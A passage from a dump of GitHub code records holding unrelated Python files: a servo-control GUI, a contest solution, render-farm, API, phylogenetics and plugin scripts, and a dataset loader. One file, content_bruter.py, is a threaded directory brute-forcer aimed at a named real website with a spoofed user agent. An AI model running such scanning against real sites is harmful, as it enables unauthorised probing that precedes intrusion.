tk.Label(f_dj3, font=ft2, text=\"三号舵机:\").pack(side=tk.LEFT, anchor=tk.W, padx=10)\n f_dj3.pack(fill=tk.Y, anchor=tk.W, pady=5)\n p_dj3 = tk.Spinbox(f_dj3, from_=0, to=300, width=19,textvariable=v_3, font=ft1)\n p_dj3.pack(side=tk.LEFT, padx=10)\n # 舵机四框区\n f_dj4 = tk.Frame(frame)\n tk.Label(f_dj4, font=ft2, text=\"四号舵机:\").pack(side=tk.LEFT, anchor=tk.W, padx=10)\n f_dj4.pack(fill=tk.Y, anchor=tk.W, pady=5)\n p_dj4 = tk.Spinbox(f_dj4, from_=0, to=300, width=19,textvariable=v_4, font=ft1)\n p_dj4.pack(side=tk.LEFT, padx=10)\n # 舵机五框区\n f_dj5 = tk.Frame(frame)\n tk.Label(f_dj5, font=ft2, text=\"五号舵机:\").pack(side=tk.LEFT, anchor=tk.W, padx=10)\n f_dj5.pack(fill=tk.Y, anchor=tk.W, pady=5)\n p_dj5 = tk.Spinbox(f_dj5, from_=0, to=300, width=19,textvariable=v_5, font=ft1)\n p_dj5.pack(side=tk.LEFT, padx=10)\n # 舵机六框区\n f_dj6 = tk.Frame(frame)\n tk.Label(f_dj6, font=ft2, text=\"六号舵机:\").pack(side=tk.LEFT, anchor=tk.W, padx=10)\n f_dj6.pack(fill=tk.Y, anchor=tk.W, pady=5)\n p_dj6 = tk.Spinbox(f_dj6, from_=0, to=300, width=19,textvariable=v_6, font=ft1)\n p_dj6.pack(side=tk.LEFT, padx=10)\n\n\n #---------------------------彩虹边框------------------------------------\n tk.Frame(Wd, width=25, bg=\"OrangeRed\").pack(side=tk.LEFT, fill=tk.Y)\n tk.Frame(Wd, height=25, bg=\"OrangeRed\").pack(side=tk.TOP, fill=tk.X)\n tk.Frame(Wd, height=25, bg=\"OrangeRed\").pack(side=tk.BOTTOM, fill=tk.X)\n tk.Frame(Wd, width=25, bg=\"OrangeRed\").pack(side=tk.RIGHT, fill=tk.Y)\n\n tk.Frame(Wd, width=25, bg=\"Orange\").pack(side=tk.LEFT, fill=tk.Y)\n tk.Frame(Wd, height=25, bg=\"Orange\").pack(side=tk.TOP, fill=tk.X)\n tk.Frame(Wd, height=25, bg=\"Orange\").pack(side=tk.BOTTOM, fill=tk.X)\n tk.Frame(Wd, width=25, bg=\"Orange\").pack(side=tk.RIGHT, fill=tk.Y)\n\n tk.Frame(Wd, width=25, bg=\"Gold\").pack(side=tk.LEFT, fill=tk.Y)\n tk.Frame(Wd, height=25, bg=\"Gold\").pack(side=tk.TOP, fill=tk.X)\n tk.Frame(Wd, height=25, bg=\"Gold\").pack(side=tk.BOTTOM, fill=tk.X)\n tk.Frame(Wd, width=25, bg=\"Gold\").pack(side=tk.RIGHT, fill=tk.Y)\n\n tk.Frame(Wd, width=25, bg=\"Yellow\").pack(side=tk.LEFT, fill=tk.Y)\n tk.Frame(Wd, height=25, bg=\"Yellow\").pack(side=tk.TOP, fill=tk.X)\n tk.Frame(Wd, height=25, bg=\"Yellow\").pack(side=tk.BOTTOM, fill=tk.X)\n tk.Frame(Wd, width=25, bg=\"Yellow\").pack(side=tk.RIGHT, fill=tk.Y)\n\n tk.Frame(Wd, width=25, bg=\"GreenYellow\").pack(side=tk.LEFT, fill=tk.Y)\n tk.Frame(Wd, height=25,bg=\"GreenYellow\").pack(side=tk.TOP, fill=tk.X)\n tk.Frame(Wd, height=25, bg=\"GreenYellow\").pack(side=tk.BOTTOM, fill=tk.X)\n tk.Frame(Wd, width=25, bg=\"GreenYellow\").pack(side=tk.RIGHT, fill=tk.Y)\n\n tk.Frame(Wd, width=65, bg=\"Cyan\").pack(side=tk.LEFT, fill=tk.Y)\n tk.Frame(Wd, height=20, bg=\"Cyan\").pack(side=tk.TOP, fill=tk.X)\n tk.Frame(Wd, height=20, bg=\"Cyan\").pack(side=tk.BOTTOM, fill=tk.X)\n tk.Frame(Wd, width=65, bg=\"Cyan\").pack(side=tk.RIGHT, fill=tk.Y)\n #-------------------------------------------------------------------------\n\n Bt=tk.Canvas(Wd,bg=\"Cyan\")\n Bt.pack(side=tk.TOP, padx=0, pady=0)\n def reset():\n v_1.set(\"0\")\n v_2.set(\"0\")\n v_3.set(\"0\")\n v_4.set(\"0\")\n v_5.set(\"0\")\n v_6.set(\"0\")\n\n tk.Button(Bt,text='复位', width=15, height=1, bg=\"MediumPurple\", font=ft2,command=reset)\\\n .pack(padx=10,anchor=tk.W,side=tk.LEFT)\n tk.Button(Bt, text='应用', width=15, height=1, bg=\"MediumPurple\", font=ft2, command=reset) \\\n .pack(padx=10, anchor=tk.W, side=tk.RIGHT)\n\n\n def Wd_2():\n Wd = tk.Toplevel()\n Wd.geometry(\"%dx%d\" % (800, 620)) # 窗体尺寸\n Wd.title(\"手动抓取界面\") # 窗体标题\n Wd.grab_set()\n Wd.resizable(True, True)\n\n frame = tk.Frame(Wd, height=20, bg=\"Bisque\")\n ft0 = tkFont.Font(family=\"微软雅黑\", size=18, weight=tkFont.BOLD)\n tk.Label(frame, font=ft0, bg=\"Khaki\", fg=\"black\", text=\"请自动调控机械臂参数\") \\\n .pack(padx=20)\n frame.pack(fill=tk.X)\n\n\n #**********主界面按钮设置*************\n ft2 = tkFont.Font(family=\"微软雅黑\", size=14, weight=tkFont.BOLD)\n tk.Button(canvas, text=\"手动抓取\", bg=\"cadetblue\", command=shou_dong, font=ft2, height=2, fg=\"white\", width=15) \\\n .pack(side=tk.LEFT, expand=tk.YES, anchor=tk.CENTER, padx=5)\n tk.Button(canvas, text=\"自动抓取\", bg=\"cadetblue\", command=zi_dong, font=ft2, height=2, fg=\"white\", width=15) \\\n .pack(side=tk.RIGHT, expand=tk.YES, anchor=tk.CENTER, padx=5)\n #********************************\n window.mainloop()\n #window.body() # 调用body()函数\nif __name__ == '__main__':\n main()","repo_name":"Sunqk5665/Python_projects","sub_path":"舵机控制界面/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10524,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"32369618107","text":"import itertools\nimport heapq\n\nM = int( input() )\nuv = [ tuple( map( int, input().split() ) ) for _ in range( M ) ]\np = list( map( int, input().split() ) )\n\nfor i in range( 8 ):\n p[ i ] -= 1\n\nfor i in range( 9 ):\n if not i in p:\n p.append( i )\n break\n\nl = [ 0, 1, 2, 3, 4, 5, 6, 7, 8 ]\nvertex = []\nmapping = {}\nfor i, per in enumerate( itertools.permutations( l, 9 ) ):\n v = \"\".join( map( str, per ) )\n vertex.append( v )\n mapping[ v ] = i\n\nconnect = [ [] for _ in range( 9 ) ]\nfor u, v in uv:\n connect[ u - 1 ].append( v - 1 )\n connect[ v - 1 ].append( u - 1 )\n\ndef arrow( v ):\n v1 = vertex[ v ]\n u = v1[ -1 ]\n res = []\n for w in connect[ int( u ) ]:\n v2 = []\n for i in range( 9 ):\n if v1[ i ] == str( w ):\n v2.append( str( u ) )\n elif v1[ i ] == str( u ):\n v2.append( str( w ) )\n else:\n v2.append( v1[ i ] )\n\n v2 = \"\".join( v2 )\n res.append( mapping[ v2 ] )\n \n return res\n\nvisited = [ 0 ] * 362880\ncost = [ 10 ** 18 ] * 362880\ns = \"012345678\"\ncost[ mapping[ s ] ] = 0\nqueue = [ ( cost[ mapping[ s ] ], mapping[ s ] ) ]\nwhile queue:\n c, v = heapq.heappop( queue )\n visited[ v ] = 1\n for u in arrow( v ):\n if visited[ u ] == 1:\n continue\n \n if cost[ u ] > c + 1:\n cost[ u ] = c + 1\n heapq.heappush( queue, ( cost[ u ], u ) )\n\nans = cost[ mapping[ \"\".join( map( str, p ) ) ] ]\nif ans >= 10 ** 18:\n print( -1 )\nelse:\n print( ans )","repo_name":"tsukasa2/AtCoder","sub_path":"contest/ABC/224/abc224-d.py","file_name":"abc224-d.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17438148861","text":"'''\r\n QueryDeadlineInjectData.py - Capture and record custom job statistics\r\n\r\n Puesdo-code:\r\n Check every active job in the queue:\r\n IF job is currently active (rendering/queued) THEN\r\n Return job object & tasks and calculate job stats object\r\n Query & inject average frame render time into column \"ExtraInfo2\" for each job\r\n Query & inject peak ram usage into column \"ExtraInfo3\" for each job\r\n\r\n Notes:\r\n 1. It is assumed a studio will rename the \"ExtraInfo2\" column used to something more meaningful such as \"Average Frame Render Time\" via repo options\r\n 2. It is assumed a studio will rename the \"ExtraInfo3\" column used to something more meaningful such as \"Peak RAM Usage\" via repo options\r\n 2. It is assumed we are only checking currently \"Active\" & \"Queued\" jobs only\r\n 3. It is assumed we are running this python script on a machine that has the Deadline client software already installed\r\n'''\r\n\r\nfrom System import TimeSpan\r\n\r\nfrom Deadline.Scripting import *\r\nfrom Deadline.Jobs import *\r\n\r\n\r\ndef __main__():\r\n\r\n print(\"Script Started...\")\r\n\r\n MIN_COMPLETED_TASKS = 0 # Min - Number of Completed Tasks BEFORE the job is queried. Change as applicable\r\n\r\n for job in RepositoryUtils.GetJobs(True):\r\n # Filter out non-\"Active\" jobs\r\n if job.JobStatus != \"Active\":\r\n continue\r\n \r\n print(\"JobStatus: %s\" % job.JobStatus)\r\n\r\n jobId = job.JobId\r\n print(\"JobId: %s\" % jobId)\r\n \r\n jobName = job.JobName\r\n print(\"JobName: %s\" % jobName)\r\n\r\n JobTaskCount = job.JobTaskCount\r\n print(\"JobTaskCount: %s\" % JobTaskCount)\r\n \r\n jobCompletedChunks = job.CompletedChunks\r\n print(\"JobCompletedChunks: %s\" % jobCompletedChunks)\r\n\r\n job = RepositoryUtils.GetJob(jobId, True)\r\n tasks = RepositoryUtils.GetJobTasks(job, True)\r\n stats = JobUtils.CalculateJobStatistics(job, tasks)\r\n \r\n jobAverageFrameRenderTime = stats.AverageFrameRenderTime\r\n jobPeakRamUsage = stats.PeakRamUsage / 1024 / 1024\r\n\r\n print(\"JobAverageFrameRenderTime: %s\" % jobAverageFrameRenderTime)\r\n print(\"JobPeakRamUsage: %s\" % jobPeakRamUsage)\r\n\r\n if jobCompletedChunks >= MIN_COMPLETED_TASKS:\r\n if not jobAverageFrameRenderTime.Equals(TimeSpan.Zero):\r\n if jobPeakRamUsage != 0:\r\n \r\n timeSpan = jobAverageFrameRenderTime\r\n timeSpan = \"%02dd:%02dh:%02dm:%02ds\" % (timeSpan.Days, timeSpan.Hours, timeSpan.Minutes, timeSpan.Seconds)\r\n\r\n job.ExtraInfo2 = str(timeSpan)\r\n job.ExtraInfo3 = str(jobPeakRamUsage) + \"Mb\"\r\n\r\n RepositoryUtils.SaveJob(job)\r\n else:\r\n print(\"Job Peak Ram Usage is 0Mb at this time, skipping check until next scan...\")\r\n else:\r\n print(\"Job Average Frame Render Time is 00:00:00 at this time, skipping check until next scan...\")\r\n else:\r\n print(\"Min Number of Completed Tasks: %s not yet reached, skipping check until next scan...\" % MIN_COMPLETED_TASKS)\r\n\r\n print(\"...Script Completed\")\r\n","repo_name":"ThinkboxSoftware/Deadline","sub_path":"Examples/DeadlineCommand/FarmStats/QueryDeadlineInjectData.py","file_name":"QueryDeadlineInjectData.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"31"} +{"seq_id":"44162527001","text":"class node:\n def __init__(self, data, next=None):\n self.data = data\n self.next = next\n\n\nclass linkedlist:\n def __init__(self):\n self.head = None\n\n def insert(self, data):\n new_node = node(data)\n if (self.head == None):\n self.head = new_node\n else:\n current = self.head\n while(current.next):\n current = current.next\n current.next = new_node\n\n def dele(self, data):\n current2 = self.head\n while(current2):\n if current2.data == data and current == self.head:\n self.head = current2.next\n break\n elif current2.data == data:\n prev.next = current2.next\n break\n prev = current2\n current2 = current2.next\n\n def printall(self):\n current1 = self.head\n while(current1):\n print(current1.data)\n current1 = current1.next\n\n def search(self, data):\n current3 = self.head\n i = 1\n flag = True\n while(current3):\n if current3.data == data:\n Flag = False\n print('{}th element'.format(i))\n break\n if current3.next == None:\n print('Not found')\n current3 = current3.next\n i += 1\n\n def reverse(self, temp):\n if temp:\n self.reverse(temp.next)\n print(temp.data, end=' ')\n else:\n return\n \n\n\nll = linkedlist()\nll.insert(3)\nll.insert(4)\nll.insert(5)\nll.insert(6)\nll.insert(7)\nll.search(8)\nll.dele(8)\nll.reverse(ll.head)\n","repo_name":"TanvirAhamadNSL/prac","sub_path":"python_basic/study ipynb/singly_linked_list.py","file_name":"singly_linked_list.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5454360262","text":"import requests\nimport json\nimport logging\nfrom functools import lru_cache\nimport config.operations as operations\n\nlogging.captureWarnings(True)\n\n##\n## function to obtain a new OAuth 2.0 token from the authentication server\n##\n@lru_cache(maxsize=1)\ndef get_new_token():\n\n url = 'https://id.cisco.com/oauth2/default/v1/token'\n client_id = operations.get_config_value(\"ciscoClientId\", \"configurations.json\")\n client_secret = operations.get_config_value('ciscoClientSecret', \"configurations.json\")\n\n params = {\n 'grant_type': 'client_credentials',\n 'client_id': client_id,\n 'client_secret': client_secret\n }\n\n headers = {\n 'Content-Type':'application/x-www-form-urlencoded'\n }\n\n token_response = requests.post(url=url, params=params, headers=headers)\n \n if token_response.status_code == 200:\n return token_response.json()['access_token']\n \n return None\n\n# Chaching results of the same products so we don't have to slam the Cisco API for larger queries\n@lru_cache(maxsize=64)\ndef call(pid, version):\n\n ## \n ## \tobtain a token before calling the API for the first time\n ##\n token = get_new_token()\n\n url = f\"https://apix.cisco.com/software/suggestion/v2/suggestions/releases/productIds/{pid}?pageIndex=1\"\n\n payload = {}\n headers = {\n 'Authorization': f'Bearer {token}',\n 'Content-Type': 'application/json'\n }\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n if response.status_code == 200:\n response_dict = response.json()\n softwarelist = response_dict['productList']\n \n for software in softwarelist:\n # Software Type Ids for IOS-XE, NXOS and IOS resepctively\n if software['product']['softwareType'] in ['IOS Software', 'IOS XE Software', 'NX-OS System Software']:\n return software['suggestions'][0]['relDispName']\n\n else:\n return None","repo_name":"netman-su/netrun-app","sub_path":"netrun/api/cisco_api.py","file_name":"cisco_api.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"14810172356","text":"import argparse\n\nimport PyAstronomy\nimport numpy as np\nfrom Bio import Phylo\nfrom tqdm import tqdm\nimport os\nfrom ete3 import Tree\nimport json\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom process_beast_log import numericToCalander\n\ndef numericToCalander(d):\n return PyAstronomy.pyasl.decimalYearGregorianDate(d)\n\ndef get_importation_dates(treepath, branch_dates):\n \"\"\"\n get importation dates according to Volz report here:\n http://sarscov2phylodynamics.org/2020/04/08/importations.html\n :param treepath: a path to a tree file\n :param branch_dates: json file containing dates for each internal node.\n one of NextStrain standard outputs\n :return: a list containing the distribution of dates.\n \"\"\"\n # open tree files\n tree = Phylo.read(treepath, \"newick\")\n with open(branch_dates) as json_file:\n nodes_to_dates = json.load(json_file)\n\n tips = [t for t in tree.get_terminals() if 'Israel' in t.name]\n dates_distribution = []\n for t in tips:\n tip_date = nodes_to_dates['nodes'][t.name]['numdate']\n node_path = [n for n in tree.get_path(t) if 'Wuhan' not in n.name or 'Israel' not in n.name]\n # remove outlier nodes\n #node_path = [n for n in node_path if (n.name != 'NODE_0000034' or n.name != 'NODE_0000035')]\n node_path = [n for n in node_path]\n node_names = [n.name for n in node_path if '.' not in n.name] # remove the 1.00 addition after polytomy splitting\n #dates = [nodes_to_dates['nodes'][n]['numdate'] for n in node_names]\n dates = []\n for node in node_names:\n if nodes_to_dates['nodes'][node]['numdate'] > 2019.9:\n print(\"WARNINIG: Detected a date beroe 2019.9\")\n dates.append(nodes_to_dates['nodes'][node]['numdate'])\n mean_dates = [np.mean([tip_date, node_date]) for node_date in dates]\n dates_distribution.extend(mean_dates)\n return dates_distribution\n\ndef analyze_simulated_trees():\n\n n = 20\n dfs = []\n for i in range(n):\n treetime_outfile = fr\"/Users/daniellemiller/Documents/GitHub/COVID19/data/\" \\\n fr\"importations_sampled_trees/sim_treetime_{i+1}.nwk\"\n node_data_outfile = fr\"/Users/daniellemiller/Documents/GitHub/COVID19/data/\" \\\n fr\"importations_sampled_trees/sim_branch_lengths_{i+1}.json\"\n vals = get_importation_dates(treetime_outfile, node_data_outfile)\n df = pd.DataFrame({'sim': i+1, 'dates': vals})\n dfs.append(df)\n res = pd.concat(dfs)\n\n # plot the kde\n ax = sns.distplot(res['dates'], hist=False, kde_kws={'shade': True}, color='#D9C12B')\n ax.axvline(2020.14, label='2020-02-21', linestyle='--', color='red', alpha=0.5)\n ax.axvline(2020.253, label='last sample', linestyle='--')\n # rename the xticks with labels\n x_ticks = ax.get_xticks()\n ax.set_xticks(x_ticks[::2])\n xlabels = [pd.to_datetime(numericToCalander(y)).date() for y in x_ticks[::2]]\n ax.set_xticklabels(xlabels)\n plt.legend()\n sns.despine(offset=15)\n plt.show()\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\n description=\"Down sample sequences from FASTA\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\"--tree_input\", required=True, help=\"The raw ML tree\")\n parser.add_argument(\"--aln\", required=True, help=\"alignment file path\")\n parser.add_argument(\"--metadata\", required=True, help=\"metadata tsv file path\")\n parser.add_argument(\"--nsim\",type=int, default=20, help=\"number of simulations\")\n args = parser.parse_args()\n\n skeleton_tree_path = args.tree_input\n aln = args.aln\n metadata = args.metadata\n nsim = args.nsim\n\n for i in tqdm(range(nsim)):\n out_file = fr\"../results/sim_tree_{i+1}.nwk\"\n # resolve polytomies and collapse low confidence splits\n\n tree = Tree(skeleton_tree_path)\n tree.resolve_polytomy(recursive=True)\n tree.write(outfile=out_file)\n\n\n # re-run tree time to create a new pull of trees\n treetime_outfile = fr\"../results/sim_treetime_{i+1}.nwk\"\n node_data_outfile = fr\"../results/sim_branch_lengths_{i+1}.json\"\n clock_rate = np.random.uniform(0.0009,0.0015)\n os.system(f\"augur refine \\\n --tree {out_file} \\\n --alignment {aln} \\\n --metadata {metadata} \\\n --output-tree {treetime_outfile} \\\n --output-node-data {node_data_outfile} \\\n --root Wuhan-Hu-1/2019 \\\n --timetree \\\n --clock-rate {clock_rate} \\\n --coalescent skyline \\\n --date-inference marginal \\\n --divergence-unit mutations \\\n --date-confidence \\\n --no-covariance\")\n #re-run ancestral state reconstruction\n ancestral_node_data_outfile = fr\"/Users/daniellemiller/Documents/GitHub/COVID19/data/\" \\\n fr\"importations_sampled_trees/sim_nt_muts_{i+1}.json\"\n os.system(f\"augur ancestral \\\n --tree {treetime_outfile} \\\n --alignment {aln} \\\n --output-node-data {ancestral_node_data_outfile} \\\n --inference joint \\\n --keep-ambiguous\")\n\n\n\n\n\n","repo_name":"Stern-Lab/SARSCOV2NGS","sub_path":"scripts/approximate_importations.py","file_name":"approximate_importations.py","file_ext":"py","file_size_in_byte":5471,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"32586313575","text":"import os\n\nimport sublime\nimport sublime_plugin\n\n\nclass EePrependModCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n self.validate_file_extension()\n\n if self.is_prepended_module_file_opened():\n original_filepath = self.view.file_name().replace('ee', '')\n return self.view.window().open_file(original_filepath)\n\n self.set_prepended_module_path()\n self.set_klass_name()\n\n if not self.is_prepend_mod_line_exist():\n self.add_prepend_mod_line(edit)\n\n if not os.path.exists(self.prepended_module_path):\n create_file(self.prepended_module_path, self.build_prepended_module_skeleton())\n\n self.view.window().open_file(self.prepended_module_path)\n\n # Setters\n\n def set_prepended_module_path(self):\n original_path = self.view.file_name()\n paths = original_path.split('/')\n\n try:\n split_folder_index = paths.index('app')\n split_folder_name = 'app'\n except ValueError:\n split_folder_index = paths.index('lib')\n split_folder_name = 'lib'\n\n root_path = '/'.join(paths[:split_folder_index] + [f'ee/{split_folder_name}/'])\n\n if split_folder_name == 'app':\n if 'concerns' in paths:\n self.prepended_module_path = root_path + '/'.join(paths[split_folder_index + 1:-1] + ['ee', paths[-1]])\n else:\n self.prepended_module_path = root_path + '/'.join([paths[split_folder_index + 1], 'ee'] + paths[split_folder_index + 2:])\n else:\n self.prepended_module_path = root_path + '/'.join(['ee'] + paths[split_folder_index + 1:])\n\n def set_klass_name(self):\n # Finds start index from string (ee/.../ee/)\n start_index = self.prepended_module_path.rindex('ee') + 2\n # Filepath has extension `.rb`\n end_index = self.prepended_module_path.index('.')\n\n klass_path = self.prepended_module_path[start_index:end_index]\n # Camelize & glue together with `::`\n self.klass_name = klass_path.title().replace('_', '').replace('/', '::')[2:]\n\n # Actions\n\n def add_prepend_mod_line(self, edit):\n self.view.insert(edit, self.view.size(), f\"\\n{self.klass_name}.prepend_mod\")\n self.view.run_command('save')\n\n # Helper methods\n\n def validate_file_extension(self):\n if not '.rb' in self.view.file_name():\n raise ValueError('Not ruby file')\n\n if 'ee' in self.view.file_name() and not self.is_prepended_module_file_opened():\n raise ValueError('Not prepened module path')\n\n def is_prepended_module_file_opened(self):\n return self.view.file_name().count('ee') == 2\n\n def is_prepend_mod_line_exist(self):\n last_line_number = self.view.rowcol(self.view.size())[0]\n\n prelast_line_point = self.view.text_point(last_line_number - 1, 0)\n prelast_line_region = self.view.line(prelast_line_point)\n prelast_line_content = self.view.substr(prelast_line_region)\n\n return 'prepend_mod' in prelast_line_content\n\n def build_prepended_module_skeleton(self):\n skeleton = '# frozen_string_literal: true\\n\\n'\n namespaces = ['EE'] + self.klass_name.split('::')\n indent = 0\n\n for namespace in namespaces:\n skeleton += f\"{indent * ' '}module {namespace}\\n\"\n indent += 2\n\n skeleton += f\"{indent * ' '}extend ::Gitlab::Utils::Override\\n\"\n\n while indent != 0:\n indent -= 2\n skeleton += f\"{indent * ' '}end\\n\"\n\n return skeleton\n\ndef create_file(filename, data):\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n\n with open(filename, 'w') as file:\n file.write(data)\n\n","repo_name":"zzaakiirr/sublime-gitlab-ee-prepend-mod","sub_path":"EePrependMod.py","file_name":"EePrependMod.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34160945600","text":"from pathlib import Path\nfrom sklearn.model_selection import train_test_split\nfrom PIL import Image\nfrom sklearn.preprocessing import LabelEncoder\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nfrom collections import Counter\nimport numpy as np\nimport pickle\nimport torch\n\n# SimpsonsDataset wrapper for data load\nclass SimpsonsDataset(Dataset):\n def __init__(self, files, mode, aug_len=None):\n super().__init__()\n self.labels = [path.parent.name for path in files]\n\n self.mode = mode\n\n self.files = files\n\n self.label_encoder = LabelEncoder()\n self.label_encoder.fit(self.labels)\n\n if self.mode == 'train':\n with open('label_encoder.pkl', 'wb') as lb_file:\n pickle.dump(self.label_encoder, lb_file)\n\n def __len__(self):\n return len(self.files)\n\n def load_img(self, img):\n image = Image.open(img)\n return self.prepare_sample(image)\n\n def prepare_sample(self, img):\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Resize((290, 290)),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n image = transform(img)\n return image.numpy().astype(np.float32)\n\n def transform_sample(self, img):\n \"\"\"\n param img: image for transform\n return: transformed image\n \"\"\"\n\n transform = {\n 'Crop': transforms.Compose([\n transforms.Resize((310, 310)),\n transforms.CenterCrop((305, 305)),\n transforms.RandomCrop((290, 290))\n ]),\n 'Rotate': transforms.Compose([\n transforms.RandomRotation((-25, 25))\n ]),\n 'Hflip': transforms.Compose([\n transforms.RandomHorizontalFlip(p=1)\n ])\n }\n transform_list = list(transform.keys())\n\n augmenter = transform[transform_list[np.random.randint(3)]]\n aug_img = augmenter(img)\n\n return aug_img\n\n def __getitem__(self, item):\n img = torch.from_numpy(self.load_img(self.files[item]))\n x = self.transform_sample(img) if self.mode == 'train' else img\n\n if self.mode == 'test':\n return x\n\n y = self.label_encoder.transform([self.labels[item]]).item()\n return x, y\n\n\n\"\"\"\n Inside the folder \"simpsons_dataset\" contains the same folder \"simpsons_dataset\",\n which should be deleted because it duplicates the same data.\n data/simpsons_dataset/simpsons_dataset/\n\"\"\"\n# shutil.rmtree('../data/simpsons_dataset/simpsons_dataset/') # delete double folder data\ntrain_files_path = Path(\"../data/simpsons_dataset/\") # data path\n\nfiles = list(train_files_path.rglob('*.jpg'))\nlabels = np.unique([path.parent.name for path in files])\n\ndef augmentation(img):\n transform = {\n 'Crop': transforms.Compose([\n transforms.Resize((310, 310)),\n transforms.CenterCrop((305, 305)),\n transforms.RandomCrop((290, 290))\n ]),\n 'Rotate': transforms.Compose([\n transforms.RandomRotation((-25, 25))\n ]),\n 'Hflip': transforms.Compose([\n transforms.RandomHorizontalFlip(p=1)\n ])\n }\n transform_list = list(transform.keys())\n\n augmenter = transform[transform_list[np.random.randint(3)]]\n aug_img = augmenter(img)\n\n return aug_img\n\nif False:\n num_aug = 1500\n to_add = Counter([path.parent for path in files])\n\n for name, value in to_add.items():\n add = (1500 - value)\n idx = 0\n last_num = 0\n while add != 0 and add > -1:\n add_zero = '0' * (4 - len(str(idx)))\n pattern_src = '{}\\pic_{}{}.jpg'\n src = pattern_src.format(name, add_zero, idx)\n if Path(src).is_file():\n add_zero = '0' * (4 - len(str(last_num)))\n img = Image.open(src)\n img.load()\n img = augmentation(img)\n print(img, name, add, pattern_src.format(name, 'aug_'+add_zero, last_num))\n img.save(pattern_src.format(name, 'aug_'+add_zero, last_num))\n last_num += 1\n add -= 1\n idx = 0 if idx == value else idx + 1\nelse:\n train_files_path = Path(\"../data/simpsons_dataset/\") # data path\n\n files = list(train_files_path.rglob('*.jpg'))\n labels = np.unique([path.parent.name for path in files])\n print(files)\n train_files_path, valid_files_path = train_test_split(files, train_size=0.8,\n stratify=[path.parent.name for path in files])\n\n data_train = SimpsonsDataset(train_files_path, 'train')\n data_valid = SimpsonsDataset(valid_files_path, 'valid')","repo_name":"stolzor/classification_simpsons","sub_path":"preproc_data/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37520742065","text":"\"\"\"\n 暴力破解目标 WEB 连接\n\"\"\"\nimport urllib.request\nimport threading\nimport queue\nimport urllib.parse\n\nthreads = 50\ntarget_url = \"https://www.xs8.cn\"\nword_list_file = \"D://all.txt\"\nresume = None\nuser_agent = \"Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0\"\nattempt_list = []\n\n\ndef build_word_list(the_word_list_file):\n words = queue.Queue()\n with open(word_list_file, \"rb\") as f:\n raw_buffer = f.readlines()\n for word in raw_buffer:\n word = word.rstrip()\n words.put(word.decode())\n # print(word.decode())\n return words\n\n\ndef dir_bruter(word_queue, extensions=None):\n while not word_queue.empty():\n attempt = word_queue.get()\n print(attempt)\n if \".\" not in attempt:\n attempt_list.append(\"/{}/\".format(attempt))\n if extensions:\n for extension in extensions:\n attempt_list.append(\"/{}{}\".format(attempt,extension))\n else:\n attempt_list.append(\"/{}\".format(attempt))\n\n for brute in attempt_list:\n url = \"{}{}\".format(target_url, urllib.parse.quote(brute))\n try:\n headers = {\"User-Agent\": user_agent}\n opener = urllib.request.Request(url, headers=headers)\n response = urllib.request.urlopen(opener)\n if len(response.read()):\n print(\"[{}] => {}\".format(response.code, url))\n except urllib.request.URLError as e:\n if hasattr(e, \"code\") and e.code != 404:\n print(\"[{}] => {}\".format(e.code, url))\n\n\ndef main():\n words_queue = build_word_list(word_list_file)\n extensions = [\".php\", \".bak\", \".orig\", \".inc\"]\n\n for i in range(threads):\n thr = threading.Thread(target=dir_bruter, args=(words_queue, extensions))\n thr.start()\n\n\nif __name__ == '__main__':\n main()","repo_name":"zhangbios/LearnBlack","sub_path":"Unit4/content_bruter.py","file_name":"content_bruter.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"13993805608","text":"#!/usr/bin/python3\ndef uppercase(str):\n toupper = \"\"\n for n in str:\n if ord(n) < 123 and ord(n) > 96:\n num = ord(n) - 32\n toupper += chr(num)\n elif ord(n) < 96:\n toupper += n\n print(\"{}\".format(toupper))\n","repo_name":"Bezawork-pr/alx-higher_level_programming","sub_path":"0x01-python-if_else_loops_functions/8-uppercase.py","file_name":"8-uppercase.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25463572866","text":"#!/usr/bin/python3\n\nimport sys\n\nbuff = {}\n\nwith open('KKS15_vypis_disku_150910.txt', 'r') as f:\n\tfor line in f:\n\t\ttry:\n\t\t\tname, fn = line.split('\\\\')\n\t\texcept:\n\t\t\tbroken = line.split('\\\\')\n\t\t\tname = broken[2]\n\t\t\tfn = broken[3]\n\n\t\tname = name.upper().strip()\n\t\tfn = int(fn.replace('.tif','').replace('x7','').strip())\n\n\t\tif name not in buff:\n\t\t\tbuff[name] = []\n\n\t\tif fn not in buff[name]:\n\t\t\tbuff[name].append(fn)\n\t\telse:\n\t\t\tprint('Dup: ' + str(fn))\n\nfor name in 